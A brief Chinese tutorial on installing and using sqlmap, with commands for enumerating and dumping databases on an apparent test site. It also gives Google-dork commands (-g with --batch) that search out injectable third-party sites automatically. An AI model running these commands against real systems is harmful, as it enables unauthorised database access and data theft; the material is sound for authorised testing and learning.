学习Sqlmap所需基础知识或技能
1、数据库的使用
2、了解Sql注入
一、Sqlmap环境搭建
1、【推荐方式】直接从官网下载对应版本的包,安装即可
https://www.kali.org/downloads/
安装教程:
https://blog.csdn.net/qq_43613144/article/details/90488973
2、逐个工具安装
在所在官网上,找到并安装python 2.7、Sqlmap;安装好后需要配置环境变量,可参考网上文章:
https://blog.csdn.net/qq_33530840/article/details/82144515
二、Sqlmap的使用
常见命令
https://www.fujieace.com/hacker/tools/sqlmap-use.html
获取系统的基本信息
1、SQLMAP参数格式
sqlmap -u URL, URL目标URL
ep: sqlmap -u "https://test.wamibao.com/inettest/#/index" --cookie="xxxxxxxxxxxx"
获取结果
2、获取系统基本信息
sqlmap -r REQUESTFILE, 从一个文件中载入HTTP请求
ep: sqlmap -r 目标文件路径
获取request请求
保存为test.txt文档
进行sqlmap
执行结果
3、获取数据库的数据
a.查看数据库
--dbs 枚举数据库管理系统中的数据库名称
sqlmap -u "https://test.wamibao.com/inettest/#/index" --cookie="xxxxxxxxxxxx" --dbs
b.扫码数据表
--tables 枚举数据库中的表名称
sqlmap -u "https://test.wamibao.com/inettest/#/index" --cookie="xxxxxxxxxxxx" --tables
c.导出数据
--dump 转储数据库中的表数据
--dump-all 转储数据库中的表所有数据
4、sqlmap -g寻找注入点
ep1: sqlmap -g "admin.php?id=" --batch --smart
ep2: sqlmap -g "inurl:".php?id=1"" --batch --smart
--batch 自动选择yes --smart 启发式快速判断
三、如何防范sql注入
1、web防护墙
2、开发人员注意的地方
